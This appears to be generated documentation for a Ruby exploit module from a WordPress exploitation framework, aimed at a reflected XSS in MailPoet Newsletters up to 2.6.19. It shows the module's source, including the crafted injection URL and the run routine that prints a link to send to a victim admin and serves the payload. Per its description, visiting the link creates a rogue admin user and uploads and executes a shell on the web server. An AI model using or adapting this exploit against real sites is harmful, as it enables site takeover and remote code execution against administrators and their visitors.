class Wpxf::Exploit::MailpoetNewslettersReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'MailPoet Newsletters <= 2.6.19 Reflected XSS Shell Upload', desc: 'This module prepares a payload and link that can be sent to an '\ 'admin user which when visited with a valid session will create '\ 'a new admin user which will be used to upload and execute the '\ 'selected payload in the context of the web server.', author: [ 'Netsparker', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8373'], ['URL', 'https://www.netsparker.com/ns-16-002-xss-vulnerability-identified-in-mailpoet-newsletters/'] ], date: 'Feb 02 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 27 def check check_plugin_version_from_readme('wysija-newsletters', '2.7') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 37 def run return false unless super @success = false emit_info 'Provide the URL below to the victim to begin the payload upload' puts puts url_with_xss puts start_http_server return @success end
url_with_xss()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 31 def url_with_xss "#{full_uri}?wysija-page=1&controller=confirm&wysija-key='"\ "\"--></style></script><script>#{xss_ascii_encoded_include_script}"\ '</script>&action=unsubscribe&demo=1&wysijap=subscriptions' end